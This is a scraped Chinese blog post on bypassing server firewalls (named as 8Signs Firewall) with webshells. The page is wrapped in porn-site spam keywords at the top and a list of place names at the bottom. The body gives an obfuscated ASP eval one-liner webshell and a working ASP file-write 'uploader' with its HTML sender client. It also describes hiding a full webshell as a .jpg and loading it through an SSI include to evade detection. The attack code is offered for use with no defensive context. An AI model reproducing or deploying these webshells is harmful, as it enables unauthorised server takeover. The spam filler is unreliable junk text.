最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會員登陸 & 注冊

滲透測試 - 突破防火墻免殺一句話 -cracer嗶哩嗶哩

2023-07-16 13:13 作者:鬼谷_衛(wèi)莊  | 我要投稿

asp免殺一句話<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%>

復(fù)制代碼穿透防火墻的bs小馬


服務(wù)器裝有 8Signs Firewall 防火墻的,PHP、ASP、ASPX 很多小馬大馬都不能用,所以這里推薦用BS 的馬。。。


小馬的接收端:


--------------------------------------


<%


On Error Resume Next


set gl=server.CreateObJeCt("Adodb.Stream")?


gl.Open?


gl.Type=2


gl.CharSet="gb2312"?


gl.writetext request("code")


gl.SaveToFile server.mappath(request("path")),2?


gl.Close?


set gl=nothing?


response.redirect request("path")


%>


-----------------------------------------------------


小馬的發(fā)送端,aspshelluP.Html:


------------------------------------------------------


<html>


<head>


<meta http-equiv="Content-Type" content="text/html; charset=gb2312">


<title>Asp shell up Client</title>


</head>


<style>


BODY { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; scrollbar-face-color:#E4E4F3; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color:#E4E4F3; scrollbar-darkshadow-color:#9C9CD3; scrollbar-shadow-color:#E4E4F3; scrollbar-arrow-color:#4444B3; scrollbar-track-color:#EFEFEF;}TABLE { FONT-SIZE: 9pt; BORDER-COLLAPSE: collapse; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-bottom-style: none; border-left-style: solid; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}input { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px;}textarea { font-family: "Courier New";}td { border-right-width: 1px; border-bottom-width: 1px; border-right-style: solid; border-bottom-style: solid; border-top-color: #d8d8f0;}.trHead { background-color: #e4e4f3; line-height: 3px;}.STYLE5 {font-family: Arial, Helvetica, sans-serif; font-size: 11pt;}


</style>


<body>


<table width="780" border="0" align="center" cellpadding="0" cellspacing="0">


<tr>


<td height="22" class="td" align="center" >&nbsp;<span class="STYLE5">Asp shell up Client </span> </td>


</tr>


<tr>


<td class="trHead">&nbsp;</td>


</tr>


<td align="center" class="td">&nbsp;</td>


<tr>


<td height="18" align="center" class="td">


<FORM method=post target=_blank>ShellUrl: <INPUT?


style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"?


size=58 value=http://127.0.0.1/s.asp name=act> Path: <INPUT?


style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"?


size=8 value="4.txt" name=path> <INPUT onClick="Javascipt:name=path.value;action=document.all.act.value;submit();" type=button value="Submit" name=Send><BR>


發(fā)送的webshell代碼:??


<BR><TEXTAREA style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" name=code rows=20 cols=85></TEXTAREA>


</FORM>


</td>


</tr>


<tr>


<td align="right" class="td"> Powered By <a href="#" title="點擊復(fù)制服務(wù)端到剪貼版" onclick='window.clipboardData.setData("text","\<%\nOn Error Resume Next\nset gl=server.CreateObJeCt(\"Adodb.Stream\") \ngl.Open \ngl.Type=2\ngl.CharSet=\"gb2312\" \ngl.writetext request(\"code\")\ngl.SaveToFile server.mappath(request(\"path\")),2 \ngl.Close \nset gl=nothing \nresponse.redirect request(\"path\")\n%\>");alert("\服務(wù)端已成功復(fù)制到剪貼")'>[Copy code]</a>&nbsp;4ngr7 &nbsp;&nbsp;</td>


</tr><tr><td class="trHead">&nbsp;</td></tr>


</table>


</body>


</html>

復(fù)制代碼還有就是先把你需要上傳的大馬名字改為xxx.jpg一些防火墻不檢測圖片的。

然后新建一個ASP內(nèi)容為內(nèi)容是<!--#include file="xxx.jpg" -->?

之后就成功包含了!


滲透測試 - 突破防火墻免殺一句話 -cracer嗶哩嗶哩的評論 (共 條)

分享到微博請遵守國家法律
昌平区| 子长县| 青海省| 巴青县| 西乌珠穆沁旗| 柞水县| 东丰县| 靖西县| 广元市| 诸暨市| 甘泉县| 武安市| 涡阳县| 尼勒克县| 神木县| 广昌县| 凌海市| 七台河市| 南城县| 临漳县| 临夏市| 丽水市| 积石山| 大洼县| 余庆县| 北票市| 增城市| 丽江市| 沁水县| 宁陵县| 曲阜市| 元谋县| 满洲里市| 东安县| 横峰县| 台湾省| 永吉县| 宁南县| 永仁县| 达州市| 凤凰县|